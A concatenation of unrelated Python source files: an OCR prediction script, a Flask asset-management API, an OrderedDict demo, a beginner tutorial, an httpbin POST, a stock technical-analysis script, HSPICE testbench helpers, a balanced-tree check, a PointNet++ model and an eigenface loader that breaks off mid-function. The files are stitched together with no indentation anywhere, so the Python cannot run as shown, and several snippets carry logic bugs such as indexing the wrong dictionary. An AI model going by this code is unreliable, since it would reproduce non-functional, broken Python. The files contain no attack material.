train = df_data[columns]
X_train = train.drop(columns = ['symbol']).values
y_train = train['symbol'].values
X_test = df.values
#Нормируем
mean_ = X_train.mean(axis=0)
std_ = X_train.std(axis=0)
X_train = (X_train - mean_) / std_
X_test = (X_test - mean_) / std_
max_ = X_train.max(axis=0)
min_ = X_train.min(axis=0)
X_train = (X_train - min_) / (max_ - min_)
X_test = (X_test - min_) / (max_ - min_)
predictor = Predictor(X_train, y_train)
predictions = predictor.predict(X_test)
string = ''
for item in predictions:
string += item[0][0]
return string, predictions
def main():
df_data = pd.read_csv("signs.csv", sep=';')
#1 картинка
image = Image.open("cropped_text.bmp")
with open("coords.txt") as file:
lines = file.readlines()
arrs = []
for line in lines:
string = line.split(' ')
string.pop()
arr = []
for item in string:
arr.append(int(item))
arrs.append(arr)
string, predictions = process_image(df_data, image, arrs)
with open("predictions.txt", 'w', encoding = "utf-8") as f:
for item in predictions:
f.write(str(item) + "\n")
print(string)
#2 картинка
image = Image.open("cropped_text2.bmp")
with open("coords2.txt") as file:
lines = file.readlines()
arrs = []
for line in lines:
string = line.split(' ')
string.pop()
arr = []
for item in string:
arr.append(int(item))
arrs.append(arr)
string, predictions = process_image(df_data, image, arrs)
with open("predictions2.txt", 'w', encoding = "utf-8") as f:
for item in predictions:
f.write(str(item) + "\n")
print(string)
#3 картинка
image = Image.open("cropped_text3.bmp")
with open("coords3.txt") as file:
lines = file.readlines()
arrs = []
for line in lines:
string = line.split(' ')
string.pop()
arr = []
for item in string:
arr.append(int(item))
arrs.append(arr)
string, predictions = process_image(df_data, image, arrs)
with open("predictions3.txt", 'w', encoding = "utf-8") as f:
for item in predictions:
f.write(str(item) + "\n")
print(string)
if __name__ == "__main__":
main() |
from flask_restful import Resource, reqparse
from backend.main_api import main_api
from backend.models import Asset, AssetSchema, User, Branch, AssetCostCenterSchema, AssetCostCenter, CostCenter
from backend.db import save_to_db, delete_from_db
from flask_jwt_extended import jwt_required
from backend.api.utils import can, able, get_user
class GetAssets(Resource):
def __init__(self):
self.parser = reqparse.RequestParser()
self.parser.add_argument('branch_id', help='This field cannot be blank', required=True)
@jwt_required
@can(action='view', thing='assets')
def get(self):
data = self.parser.parse_args()
assets = Asset.query.join(Branch, Branch.id == Asset.branch_id) \
.filter(Branch.installation_id == get_user().installation_id)\
.filter(Branch.id == data['branch_id'])\
.all()
schema = AssetSchema(many=True)
assets_data = [] if len(assets) == 0 else schema.dump(assets).data
add = able('add', 'assets')
edit = able('edit', 'assets')
delete = able('delete', 'assets')
return {
'status': 1,
'edit': edit,
'add': add,
'delete': delete,
'assets': assets_data
}
class GetAssetCostCenters(Resource):
def __init__(self):
self.parser = reqparse.RequestParser()
self.parser.add_argument('branch_id', help='This field cannot be blank', required=True)
@jwt_required
@can(action='view', thing='assets')
def get(self, asset_id):
data = self.parser.parse_args()
assets_cost_centers = AssetCostCenter.query.filter_by(asset_id=asset_id).\
join(Asset, Asset.id == AssetCostCenter.asset_id).\
join(Branch, Branch.id == Asset.branch_id).\
filter(Branch.installation_id == get_user().installation_id). \
filter(Branch.id == data['branch_id']).all()
for i in assets_cost_centers:
i.name = i.costcenter_id
schema = AssetCostCenterSchema(many=True)
assets_data = [] if len(assets_cost_centers) == 0 else schema.dump(assets_cost_centers).data
cost_centers = CostCenter.query.join(Branch, Branch.id == CostCenter.branch_id) \
.filter(Branch.installation_id == get_user().installation_id).filter(Branch.id == data['branch_id']).all()
cost_center_options = {"0": "Choose Cost Center"}
for cost_center in cost_centers:
cost_center_options["{}".format(cost_center.id)] = cost_center.name
add = able('add', 'assets')
edit = able('edit', 'assets')
delete = able('delete', 'assets')
return {
'status': 1,
'edit': edit,
'add': add,
'delete': delete,
'assets_cost_centers': assets_data,
'cost_center_options': cost_center_options
}
class AddAssetCostCenter(Resource):
def __init__(self):
self.parser = reqparse.RequestParser()
self.parser.add_argument('costcenter_id', help='This field cannot be blank', required=True)
self.parser.add_argument('rating_pct', help='This field cannot be blank', required=True)
@jwt_required
@can(action='add', thing='assets')
def post(self, asset_id):
data = self.parser.parse_args()
asset_cost_center = AssetCostCenter(
asset_id=asset_id,
costcenter_id=data['costcenter_id'],
rating_pct=data['rating_pct'],
)
try:
save_to_db(asset_cost_center)
return {'status': 1, 'id': asset_cost_center.id}
except:
return {'status': 0}, 500
class EditAssetCostCenter(Resource):
def __init__(self):
self.parser = reqparse.RequestParser()
self.parser.add_argument('costcenter_id', help='This field cannot be blank', required=True)
self.parser.add_argument('rating_pct', help='This field cannot be blank', required=True)
@jwt_required
@can(action='edit', thing='assets')
def post(self, asset_id, asset_cost_center_id):
data = self.parser.parse_args()
asset_cost_center = AssetCostCenter.query.filter_by(id=asset_cost_center_id)\
.join(Asset, Asset.id == AssetCostCenter.asset_id)\
.filter(Asset.id == asset_id)\
.join(Branch, Branch.id == Asset.branch_id)\
.filter(Branch.installation_id == get_user().installation_id).first()
if not asset_cost_center:
return {'status': 0}
asset_cost_center.asset_id = asset_id
asset_cost_center.costcenter_id = data['costcenter_id']
asset_cost_center.rating_pct = data['rating_pct']
try:
save_to_db(asset_cost_center)
return {'status': 1}
except:
return {'status': 0}, 500
class DeleteAssetCostCenter(Resource):
@jwt_required
@can('delete', 'assets')
def post(self, asset_id, asset_cost_center_id):
user = get_user()
if asset_cost_center_id == 'mass':
parser = reqparse.RequestParser()
parser.add_argument('ids', help='This field cannot be blank', required=True, type=int, action='append')
data = parser.parse_args()
assets_cost_centers = AssetCostCenter.query.filter(AssetCostCenter.id.in_(data['ids']))\
.join(Asset, Asset.id == AssetCostCenter.asset_id)\
.filter(Asset.id == asset_id)\
.join(Branch, Branch.id == Asset.branch_id)\
.filter(Branch.installation_id == user.installation_id).all()
else:
assets_cost_centers = AssetCostCenter.query.filter_by(id=asset_cost_center_id)\
.join(Asset, Asset.id == AssetCostCenter.asset_id)\
.filter(Asset.id == asset_id)\
.join(Branch, Branch.id == Asset.branch_id)\
.filter(Branch.installation_id == user.installation_id).first()
if not assets_cost_centers:
return {'status': 0}
try:
delete_from_db(assets_cost_centers)
return {'status': 1}
except:
return {'status': 0}, 500
class GetAsset(Resource):
@jwt_required
@can(action='view', thing='assets')
def get(self, asset_id):
assets = Asset.query.filter_by(id=asset_id).join(Branch, Branch.id == Asset.branch_id) \
.filter(Branch.installation_id == get_user().installation_id).all()
schema = AssetSchema(many=True)
assets_data = [] if len(assets) == 0 else schema.dump(assets).data
add = able('add', 'assets')
edit = able('edit', 'assets')
delete = able('delete', 'assets')
return {
'status': 1,
'edit': edit,
'add': add,
'delete': delete,
'asset': assets_data[0]
}
class AddAsset(Resource):
def __init__(self):
self.parser = reqparse.RequestParser()
self.parser.add_argument('description', help='This field cannot be blank', required=True)
self.parser.add_argument('description_det', help='This field cannot be blank', required=True)
self.parser.add_argument('inventory_qt', help='This field cannot be blank', required=True)
self.parser.add_argument('cost_price_unit', help='This field cannot be blank', required=True)
self.parser.add_argument('acquisition_date', help='This field cannot be blank', required=True)
self.parser.add_argument('start_depr_date', help='This field cannot be blank', required=True)
self.parser.add_argument('expiration_depr_date', help='This field cannot be blank', required=True)
self.parser.add_argument('depreciable_flag', help='This field cannot be blank', required=True)
self.parser.add_argument('branch_id', help='This field cannot be blank', required=True)
self.parser.add_argument('type_id', help='This field cannot be blank', required=True)
self.parser.add_argument('local_id', help='This field cannot be blank', required=True)
@jwt_required
@can(action='add', thing='assets')
def post(self):
data = self.parser.parse_args()
user = get_user()
asset = Asset(
description=data['description'],
description_det=data['description_det'],
inventory_qt=data['inventory_qt'],
cost_price_unit=data['cost_price_unit'],
acquisition_date=data['acquisition_date'],
start_depr_date=data['start_depr_date'],
expiration_depr_date=data['expiration_depr_date'],
depreciable_flag=data['depreciable_flag'],
type_id=data['type_id'],
local_id=data['local_id'],
branch_id=data['branch_id'],
)
try:
save_to_db(asset)
return {'status': 1}
except:
return {'status': 0}, 500
class DeleteAsset(Resource):
@jwt_required
@can('delete', 'assets')
def post(self, asset_id):
user = get_user()
if asset_id == 'mass':
parser = reqparse.RequestParser()
parser.add_argument('ids', help='This field cannot be blank', required=True, type=int, action='append')
data = parser.parse_args()
assets = Asset.query.filter(Asset.id.in_(data['ids'])).join(Branch, Branch.id == Asset.branch_id) \
.filter(Branch.installation_id == get_user().installation_id).all()
else:
assets = Asset.query.filter_by(id=asset_id).join(Branch, Branch.id == Asset.branch_id) \
.filter(Branch.installation_id == get_user().installation_id).first()
if not assets:
return {'status': 0}
try:
delete_from_db(assets)
return {'status': 1}
except:
return {'status': 0}, 500
class EditAsset(Resource):
def __init__(self):
self.parser = reqparse.RequestParser()
self.parser.add_argument('description', help='This field cannot be blank', required=True)
self.parser.add_argument('description_det', help='This field cannot be blank', required=True)
self.parser.add_argument('inventory_qt', help='This field cannot be blank', required=True)
self.parser.add_argument('cost_price_unit', help='This field cannot be blank', required=True)
self.parser.add_argument('acquisition_date', help='This field cannot be blank', required=True)
self.parser.add_argument('start_depr_date', help='This field cannot be blank', required=True)
self.parser.add_argument('expiration_depr_date', help='This field cannot be blank', required=True)
self.parser.add_argument('depreciable_flag', help='This field cannot be blank', required=True)
self.parser.add_argument('branch_id', help='This field cannot be blank', required=True)
self.parser.add_argument('type_id', help='This field cannot be blank', required=True)
self.parser.add_argument('local_id', help='This field cannot be blank', required=True)
@jwt_required
@can(action='edit', thing='assets')
def post(self, asset_id):
data = self.parser.parse_args()
user = get_user()
asset= Asset.query.filter_by(id=asset_id).join(Branch, Branch.id == Asset.branch_id) \
.filter(Branch.installation_id == get_user().installation_id).first()
if not asset:
return {'status': 0}
columns = ['description', 'description_det', 'inventory_qt', 'cost_price_unit', 'acquisition_date', 'start_depr_date',
'expiration_depr_date', 'depreciable_flag', 'branch_id', 'local_id', 'type_id']
for i in columns:
setattr(asset, '%s' % i, data[i])
try:
save_to_db(asset)
return {'status': 1}
except:
return {'status': 0}, 500
def register_assets_routes():
main_api.add_resource(GetAsset, '/api/asset/<asset_id>')
main_api.add_resource(GetAssets, '/api/assets') # View
main_api.add_resource(GetAssetCostCenters, '/api/assets/cost_centers/<asset_id>') # View
main_api.add_resource(AddAssetCostCenter, '/api/assets/cost_centers/<asset_id>/add') # View
main_api.add_resource(EditAssetCostCenter, '/api/assets/cost_centers/<asset_id>/edit/<asset_cost_center_id>')
main_api.add_resource(DeleteAssetCostCenter, '/api/assets/cost_centers/<asset_id>/delete/<asset_cost_center_id>')
main_api.add_resource(AddAsset, '/api/assets/add') # Add
main_api.add_resource(EditAsset, '/api/assets/edit/<asset_id>') # Edit
main_api.add_resource(DeleteAsset, '/api/assets/delete/<asset_id>') # Delete
|
#!/usr/bin/env python
# 你想创建一个字典,并且在迭代或序列化这个字典的时候能够控制元素的顺序。
from collections import OrderedDict
# 一个 OrderedDict 的大小是一个普通字典的两倍,因为它内部维护着另外一个链表。
# 所以如果你要构建一个需要大量 OrderedDict 实例的数据结构的时候(比如读取100,000行CSV数据到一个 OrderedDict 列表中去)
# 那么你就得仔细权衡一下是否使用 OrderedDict 带来的好处要大过额外内存消耗的影响。
d = OrderedDict()
d['foo'] = 1
d['bar'] = 2
d['spam'] = 3
d['grok'] = 4
# Outputs "foo 1", "bar 2", "spam 3", "grok 4"
for key in d:
print(key, d[key])
print("--------")
dictionar = {'foo': 1, 'bar': 2, 'spam': 3, 'grok': 4}
for key in dictionar:
print(key, d[key])
|
# functions
def print_separator():
print('--------')
print('here')
# intructions
print("Hello World")
# variables
name = 'Wes'
age = 31
total = 99.78
found = False
print(name)
print(age)
print(total)
print(age + 13)
print_separator()
# if statements
user_age = 79
if(user_age < 80):
print('You are still young')
elif(user_age ==80):
print("You are on the border")
else:
print("sorry, you are getting OLD :/") |
import requests
url = 'http://httpbin.org/post'
data = {
'name': '孔维一',
'age': 21
}
resp = requests.post(url, data=data)
print(type(resp))
print(resp)
print(resp.text)
print(resp.json())
|
import datetime as dt
import matplotlib.pyplot as plt
from matplotlib import style
import pandas as pd
import pandas_datareader.data as data
import os
import ta
ticker = input(str("Enter ticker: "))
def get_stock_prices():
data_source = 'yahoo'
start = dt.datetime(2018, 1 ,1)
end = dt.datetime.today()
df= data.DataReader(ticker, data_source, start, end)
df.to_csv('C:\\PythonClass\\ta-ticker\\{}.csv'.format(ticker))
print("Stock prices of {} is pulled!".format(ticker))
def tech_analysis():
df = pd.read_csv('C:\\PythonClass\\ta-ticker\\{}.csv'.format(ticker), parse_dates=True, index_col=0)
df['200ma'] = df['Adj Close'].rolling(window=200, min_periods=0).mean()
df['100ma'] = df['Adj Close'].rolling(window=100, min_periods=0).mean()
df['50ma'] = df['Adj Close'].rolling(window=50, min_periods=0).mean()
df['20ma'] = df['Adj Close'].rolling(window=20, min_periods=0).mean()
df['10ma'] = df['Adj Close'].rolling(window=10, min_periods=0).mean()
df['5ma'] = df['Adj Close'].rolling(window=5, min_periods=0).mean()
print("Moving Averages are created!")
"""Calculate RSI - Relative Strenght Index"""
delta = df['Close'].diff()
window = 14
up_days = delta.copy()
up_days[delta<=0]=0.0
down_days = abs(delta.copy())
down_days[delta>0]=0.0
RS_up = up_days.rolling(window).mean()
RS_down = down_days.rolling(window).mean()
rsi= 100-100/(1+RS_up/RS_down)
df['RSI']=rsi
print("Relative Strenght Index of 14 is created!")
"""Calculate CCI - Commodity Channel Index"""
ndays=21
TP = (df['High'] + df['Low'] + df['Close']) / 3
df['CCI'] = pd.Series((TP - TP.rolling(ndays).mean()) / (0.014 * TP.rolling(ndays).std()),name = 'CCI')
print("Commodity Channel Index of 21 is created!")
#Save analysis file and remove the historic data
df.tail(250).to_excel('C:\\PythonClass\\ta-ticker\\{}_SMAanalysis.xlsx'.format(ticker))
os.remove('C:\\PythonClass\\ta-ticker\\{}.csv'.format(ticker))
print("NOTE: Stock prices data file is removed!")
get_stock_prices()
tech_analysis()
|
################ modules for HSPICE sim ######################
##############################################################
######### varmap definition ####################
##############################################################
### This class is to make combinations of given variables ####
### mostly used for testbench generation #################
### EX: varmap1=HSPICE_varmap.varmap(4) %%num of var=4 #######
### varmap1.get_var('vdd',1.5,1.8,0.2) %%vdd=1.5:0.2:1.8##
### varmap1.get_var('abc', ........ %%do this for 4 var ##
### varmap1.cal_nbigcy() %%end of var input###
### varmap1.combinate %%returns variable comb 1 by 1 ####
##############################################################
class varmap:
#def __init__(self,num_var):
# self.n_smlcycle=1
# self.last=0
# self.smlcy=1
# self.bigcy=0
# self.vv=0
# self.vf=1
# self.size=num_var
# self.map=[None]*self.size
# self.comblist=[None]*self.size
# self.nvar=0
def __init__(self):
self.n_smlcycle=1
self.last=0
self.smlcy=1
self.bigcy=0
self.vv=0
self.vf=1
#self.map=[None]
#self.comblist=[None]
self.nvar=0
def get_var(self,name,start,end,step):
if self.nvar==0:
self.map=[None]
self.comblist=[None]
else:
self.map.append(None)
self.comblist.append(None)
self.map[self.nvar]=list([name])
self.comblist[self.nvar]=list([name])
self.nswp=(end-start)//step+1
for i in range(1,self.nswp+1):
self.map[self.nvar].append(start+step*(i-1))
self.nvar+=1
def cal_nbigcy(self):
self.bias=[1]*(len(self.map))
for j in range(1,len(self.map)+1):
self.n_smlcycle=self.n_smlcycle*(len(self.map[j-1])-1)
self.n_smlcycle=self.n_smlcycle*len(self.map)
def increm(self,inc): #increment bias
self.bias[inc]+=1
if self.bias[inc]>len(self.map[inc])-1:
self.bias[inc]%len(self.map[inc])-1
def check_end(self,vf): #When this is called, it's already last stage of self.map[vf]
self.bias[vf]=1
# if vf==0 and self.bias[0]==len(self.map[0])-1:
# return 0
if self.bias[vf-1]==len(self.map[vf-1])-1: #if previous column is last element
self.check_end(vf-1)
else:
self.bias[vf-1]+=1
return 1
def combinate(self):
# print self.map[self.vv][self.bias[self.vv]]
self.smlcy+=1
if self.vv==len(self.map)-1: #last variable
self.bigcy+=1
for vprint in range(0,len(self.map)):
self.comblist[vprint].append(self.map[vprint][self.bias[vprint]])
#print self.map[vprint][self.bias[vprint]]
if self.bias[self.vv]==len(self.map[self.vv])-1: #last element
if self.smlcy<self.n_smlcycle:
self.check_end(self.vv)
self.vv=(self.vv+1)%len(self.map)
self.combinate()
else:
pass
else:
self.bias[self.vv]+=1
self.vv=(self.vv+1)%len(self.map)
self.combinate()
else:
self.vv=(self.vv+1)%len(self.map)
self.combinate()
##############################################################
######### netmap ########################
##############################################################
### This class is used for replacing lines ################
### detects @@ for line and @ for nets #######################
##############################################################
#-------- EXAMPLE ---------------------------------------#
### netmap1=netmap(2) %input num_var #########################
### netmap1.get_var('ab','NN',1,4,1) %flag MUST be 2 char ####
## netmap2.get_var('bc','DD',2,5,1) %length of var must match#
# !!caution: do get_var in order, except for lateral prints ##
### which is using @W => varibales here, do get_var at last ##
### for line in r_file.readlines():###########################
### netmap1.printline(line,w_file) #######################
##############################################################
class netmap:
#def __init__(self,num_var):
# self.size=num_var
# self.map=[None]*self.size
# self.flag=[None]*self.size
# self.name=[None]*self.size
# self.nnet=[None]*self.size
# self.nn=0
# self.pvar=1
# self.cnta=0
# self.line_nvar=0 # index of last variable for this line
# self.nxtl_var=0 # index of variable of next line
# self.ci_at=100
def __init__(self):
self.nn=0
self.pvar=1
self.cnta=0
self.line_nvar=0 # index of last variable for this line
self.nxtl_var=0 # index of variable of next line
self.ci_at=-5
def get_net(self,flag,netname,start,end,step): #if start==None: want to repeat without incrementation(usually for tab) (end)x(step) is the num of repetition
if self.nn==0:
self.map=[None]
self.flag=[None]
self.name=[None]
self.nnet=[None]
else:
self.map.append(None)
self.name.append(None)
self.flag.append(None)
self.nnet.append(None)
if netname==None:
self.name[self.nn]=0
else:
self.name[self.nn]=1
self.map[self.nn]=list([netname])
self.flag[self.nn]=(flag)
if start!=None and start!='d2o':
self.nnet[self.nn]=int((end-start+step/10)//step+1)
if self.name[self.nn]==1:
for i in range(1,self.nnet[self.nn]+1):
self.map[self.nn].append('')
else:
for i in range(1,self.nnet[self.nn]+1):
self.map[self.nn].append(start+step*(i-1))
elif start=='d2o':
for i in range(0,end):
if step-i>0:
self.map[self.nn].append(1)
else:
self.map[self.nn].append(0)
i+=1
else:
self.map[self.nn]=list([netname])
for i in range(1,step+1):
self.map[self.nn].append(end)
# self.map[self.nn]=[None]*step
# for i in range(1,self.nnet[self.nn]+1):
# self.map[self.nn][i]=None
self.nn+=1
#print self.map
def add_val(self,flag,netname,start,end,step):
varidx=self.flag.index(flag)
if start!=None:
nval=int((end-start+step/10)//step+1)
for i in range(1,nval+1):
self.map[varidx].append(start+step*(i-1))
else:
for i in range(1,step+1):
self.map[varidx].append(end)
def printline(self,line,wrfile):
if line[0:2]=='@@':
#print('self.ci_at=%d'%(self.ci_at))
self.nline=line[3:len(line)]
self.clist=list(self.nline) #character list
#print(self.clist,self.nxtl_var)
for iv in range (1,len(self.map[self.nxtl_var])):
for ci in range(0,len(self.clist)):
if (ci==self.ci_at+1 or ci==self.ci_at+2) and ci!=len(self.clist)-1:
pass
elif self.clist[ci]=='@':
#print self.cnta
self.cnta+=1
self.line_nvar+=1
varidx=self.flag.index(self.clist[ci+1]+self.clist[ci+2])
if self.name[varidx]:
wrfile.write(self.map[varidx][0])
# print(self.map[varidx])
if type(self.map[varidx][self.pvar])==float:
wrfile.write('%e'%(self.map[varidx][self.pvar])) #modify here!!!!
elif type(self.map[varidx][self.pvar])==int:
wrfile.write('%d'%(self.map[varidx][self.pvar]))
self.ci_at=ci
elif ci==len(self.clist)-1: #end of the line
if self.pvar==len(self.map[self.nxtl_var+self.line_nvar-1])-1: #last element
self.pvar=1
self.nxtl_var=self.nxtl_var+self.line_nvar
self.line_nvar=0
self.cnta=0
self.ci_at=-6
#print('printed all var for this line, %d'%(ci))
else:
self.pvar+=1
#self.line_nvar=self.cnta
self.line_nvar=0
#print ('line_nvar= %d'%(self.line_nvar))
self.cnta=0
wrfile.write(self.clist[ci])
else:
wrfile.write(self.clist[ci])
elif line[0:2]=='@W':
#print('found word line')
self.nline=line[3:len(line)]
self.clist=list(self.nline)
for ci in range(0,len(self.clist)):
if (ci==self.ci_at+1 or ci==self.ci_at+2):
pass
elif self.clist[ci]=='@':
varidx=self.flag.index(self.clist[ci+1]+self.clist[ci+2])
for iv in range(1,len(self.map[varidx])):
if self.name[varidx]:
wrfile.write(self.map[varidx][0])
wrfile.write('%d '%(self.map[varidx][iv]))
print ('n is %d, varidx=%d, iv=%d'%(self.map[varidx][iv],varidx,iv))
self.ci_at=ci
else:
wrfile.write(self.clist[ci])
self.ci_at=-5
else:
wrfile.write(line)
##############################################################
######### resmap ########################
##############################################################
### This class is used to deal with results ################
### detects @@ for line and @ for nets #######################
##############################################################
#-------- EXAMPLE ---------------------------------------#
### netmap1=netmap(2) %input num_var #########################
### netmap1.get_var('ab','NN',1,4,1) %flag MUST be 2 char ####
## netmap2.get_var('bc','DD',2,5,1) %length of var must match#
### for line in r_file.readlines():###########################
### netmap1.printline(line,w_file) #######################
###### self.tb[x][y][env[]]###############################
##############################################################
class resmap:
def __init__(self,num_tb,num_words,index): #num_words includes index
self.tb=[None]*num_tb
self.tbi=[None]*num_tb
self.vl=[None]*num_tb
self.vlinit=[None]*num_tb
self.svar=[None]*num_tb
self.index=index
self.nenv=0
self.num_words=num_words
self.vr=[None]*(num_words+index) #one set of variables per plot
self.vidx=[None]*(num_words+index)
self.env=[None]*(num_words+index)
# self.vl=[None]*(num_words+index) #one set of variables per plot
for itb in range(0,len(self.tb)):
# self.tb[itb].vr=[None]*(num_words+index)
self.tbi[itb]=0 #index for counting vars within tb
self.vl[itb]=[None]*(num_words+index)
self.vlinit[itb]=[0]*(num_words+index)
def get_var(self,ntb,var):
self.vr[self.tbi[ntb]]=(var)
# self.vl[ntb][self.tbi[ntb]]=list([None])
self.tbi[ntb]+=1
if self.tbi[ntb]==len(self.vr): #????????
self.tbi[ntb]=0
def add(self,ntb,value):
if self.vlinit[ntb][self.tbi[ntb]]==0: #initialization
self.vl[ntb][self.tbi[ntb]]=[value]
self.vlinit[ntb][self.tbi[ntb]]+=1
else:
self.vl[ntb][self.tbi[ntb]].append(value)
self.tbi[ntb]=(self.tbi[ntb]+1)%len(self.vr)
def plot_env(self,ntb,start,step,xvar,xval): #setting plot environment: if ntb=='all': x axis is in terms of testbench
if ntb=='all':
self.nenv+=1
self.xaxis=[None]*len(self.tb)
for i in range(0,len(self.tb)):
self.xaxis[i]=start+i*step
self.vidx[self.nenv]=self.vr.index(xvar)
#print self.vl[0][self.vidx[self.nenv]]
print('', self.vl[0][self.vidx[self.nenv]])
self.env[self.nenv]=[i for (i,x) in enumerate(self.vl[0][self.vidx[self.nenv]]) if x=='%s'%(xval)]
else:
self.nenv+=1
self.xaxis=[None] #one output
self.xaxis=[start]
self.vidx[self.nenv]=self.vr.index(xvar)
self.env[self.nenv]=[i for (i,x) in enumerate(self.vl[0][self.vidx[self.nenv]]) if x=='%s'%(xval)]
def rst_env(self):
self.vidx[self.nenv]=None
self.env[self.nenv]=0
self.nenv=0
#print self.vl[0][self.vidx[self.nenv]]
def plot_y(self,yvar):
self.yidx=self.vr.index(yvar)
print ('yidx=%d'%(self.yidx))
#print self.vl[0][self.yidx][self.env[self.nenv][0]]
print('', self.vl[0][self.yidx][self.env[self.nenv][0]])
self.yaxis=[None]*len(self.xaxis)
for xx in range(0,len(self.xaxis)):
self.yaxis[xx]=self.vl[xx][self.yidx][self.env[self.nenv][0]]
#plt.plot(self.xaxis,self.yaxis)
#plt.ylabel(self.vr[self.yidx])
def sort(self,var):
varidx=self.vr.index(var)
for k in range(len(self.vl)): #all testbenches
self.svar[k]={} #define dict
for i in range(len(self.vl[0][0])): #all values
self.svar[k][self.vl[k][varidx][i]]=[]
for j in range(len(self.vr)): #all variables
if j!=varidx:
self.svar[k][self.vl[k][varidx][i]].append(self.vl[k][j][i])
# if k==0:
# print self.svar[k]
|
# -*- coding:utf-8 -*-
# class TreeNode:
# def __init__(self, x):
# self.val = x
# self.left = None
# self.right = None
class Balance:
def isBalance(self, root):
# write code here
(_, isB) = self.isBalanceIter(root)
return isB
# (height, isBalance)
def isBalanceIter(self, node):
if node is None:
return (0, True)
(leftH, leftB) = self.isBalanceIter(node.left)
if not leftB:
return (leftH, False)
(rightH, rightB) = self.isBalanceIter(node.right)
if not rightB:
return (rightH, False)
if abs(leftH - rightH) <= 1:
return (max(leftH, rightH)+1, True)
else:
return (max(leftH, rightH)+1, False)
|
import torch
import torch.nn as nn
import torch.nn.functional as F
from .pointnet import PointNetfeat
from .pointnet2 import PointNet2feat as PointNet2
class TPointNet2(nn.Module):
'''
TPointNet++
Extracts an initial z0 feature based on the given sequence and regresses TNOCS points.
'''
def __init__(self, radii_list=[0.02, 0.05, 0.1, 0.2, 0.4, 0.8],
local_feat_size=512, # size of the PointNet++ features
out_feat_size=1600, # size of the output latent feature size from this model.
augment_quad=True, # whether to augment quadratic terms to input of PointNet++ (x^2, y^x, z^2)
augment_pairs=True, # whether to augment pairwise multiplied terms (xy, xz, yz)
tnocs_point_size=4,
regress_tnocs=True): # if true, regresses TNOCS points in addition to extracting latent feature
super(TPointNet2, self).__init__()
self.augment_quad = augment_quad
self.augment_pairs = augment_pairs
self.tnocs_point_size = tnocs_point_size
# PointNet++ feat output size
self.local_feat_size = local_feat_size
self.local_bottleneck_size = self.local_feat_size
# PointNet feat size
self.global_feat_size = 1024
self.space_time_pt_feat = 64
# out feature size
self.latent_feat_size = out_feat_size
# PointNet++
in_features = 0 # by default we only use x,y,z as input
if self.augment_quad:
print('Augmenting quadratic terms to input of PointNet++!')
in_features += 3 # add quadratic terms
if self.augment_pairs:
print('Augmenting pairwise terms to input of PointNet++!')
in_features += 3 # add pairwise terms
self.local_extract = PointNet2(in_features=in_features,
num_classes=self.local_feat_size, # size of the output
batchnorm=False, # will use groupnorm instead
use_xyz_feature=True, # also uses the coordinate as a feature
use_random_ball_query=False,
radii_list=radii_list,
max_feat_prop_size=self.local_bottleneck_size
)
# PointNet
self.global_extract = PointNetfeat(input_dim=4, out_size=self.global_feat_size)
# layers to get space-time feature
per_point_out_size = self.global_feat_size + self.space_time_pt_feat + self.local_feat_size
self.conv1 = torch.nn.Conv1d(per_point_out_size, per_point_out_size, 1)
self.conv2 = torch.nn.Conv1d(per_point_out_size, self.latent_feat_size, 1)
self.bn1 = nn.GroupNorm(16, per_point_out_size)
self.bn2 = nn.GroupNorm(16, self.latent_feat_size)
# regress TNOCS afterward
self.regress_tnocs = regress_tnocs
if self.regress_tnocs:
self.conv3 = torch.nn.Conv1d(self.latent_feat_size, self.tnocs_point_size, 1) # output latent features besides just (x,y,z,t)
self.loss_func = torch.nn.L1Loss(reduce=False)
def forward(self, x):
B, T, N, _ = x.size()
# Global spatio-temporal feature
# output is the per-point features concatenated with global feature
global_input = x.view(B, T*N, 4).transpose(2, 1).contiguous()
global_feat = self.global_extract(global_input)
# Local spatial feature for each timestep
spatial_in = x.view(B*T, N, 4)[:,:,:3] # only want spatial inputs
local_in = spatial_in
if self.augment_quad:
# concat quadratic terms
quad_terms = spatial_in*spatial_in
local_in = torch.cat([spatial_in, quad_terms], axis=2)
if self.augment_pairs:
# concat pairwise mult terms
xz = spatial_in[:,:,0:1] * spatial_in[:,:,2:3]
xy = spatial_in[:,:,0:1] * spatial_in[:,:,1:2]
yz = spatial_in[:,:,2:3] * spatial_in[:,:,1:2]
local_in = torch.cat([local_in, xz, xy, yz], axis=2)
local_feat = self.local_extract(local_in).view(B, T, N, -1)
local_feat = local_feat.view(B, T*N, self.local_feat_size).transpose(2, 1).contiguous()
# concat global and local features
feat = torch.cat([local_feat, global_feat], dim=1)
# process to get latent features output
feat = F.relu(self.bn1(self.conv1(feat)))
feat = self.bn2(self.conv2(feat))
# further process to get TNOCS regression output
tnocs_regression = None
if self.regress_tnocs:
tnocs_out = self.conv3(F.relu(feat))
tnocs_regression = torch.sigmoid(tnocs_out[:,:self.tnocs_point_size,:])
tnocs_regression = tnocs_regression.transpose(2,1).contiguous() # B x T*N x 4
tnocs_regression = tnocs_regression.view(B, T, N, self.tnocs_point_size)
# max-pool over point-wise latent features to gets single output feature
feat_max_op = torch.max(feat, 2, keepdim=False)
feat = feat_max_op[0]
feat_max_inds = feat_max_op[1]
return feat, tnocs_regression
def loss(self, outputs, gt):
'''
Computes the loss for TNOCS regression given the outputs of the network compared to GT
TNOCS values. Returns unreduces loss values (per-point)
'''
loss = self.loss_func(outputs, gt)
return loss |
import argparse
import cv2 as cv
import os
import numpy as np
import random
import sys
class Person():
def __init__(self, id, label, data):
self.id = id
self.label = label
self.data = data
def get_image_data(file_name):
img = cv.imread(file_name, cv.IMREAD_GRAYSCALE)
# Muda o tamanho para 80x80
dst = cv.resize(img, (80, 80))
#Converter para vetor coluna
# shape = linha, coluna
dst = dst.T.reshape((1, dst.shape[1] * dst.shape[0]))
# Converte de 8 bits sem sinal, para 64 bits com sinal, preserva 1 canal apenas.
data = np.float64(dst)
return data
def to_person(file_name: str) -> Person:
# D:\xx\1_1.jpg
data_part = file_name[file_name.rfind("\\") + 1 : file_name.rfind(".jpg")]
data = data_part.split("_")
person = Person(int(data[0]), int(data[1]), get_image_data(file_name))
return person
def load_dataset(path: str, p: int):
train = []
test = []
for root, _, files in os.walk(path):
image_files = [os.path.join(root, file) for file in files if file.endswith(".jpg")]
people = [to_person(file) for file in image_files]
people.sort(key=lambda person: person.id)
num_samples_per_person = 10
index = 0
while index < len(people):
samples = people[index: index + num_samples_per_person]
while len(samples) > p:
i = random.randint(0, len(samples) - 1)
test.append(samples.pop(i))
if p == num_samples_per_person:
test.extend(samples)
train.extend(samples)
index += num_samples_per_person
return (train, test)
def run_EigenFaceRecognizer(path: str):
train = []
test = []
p = 7; # holdout de 70/30, treino/teste
train, test = load_dataset(path, p)
start_comps = 10
max_comps = 21
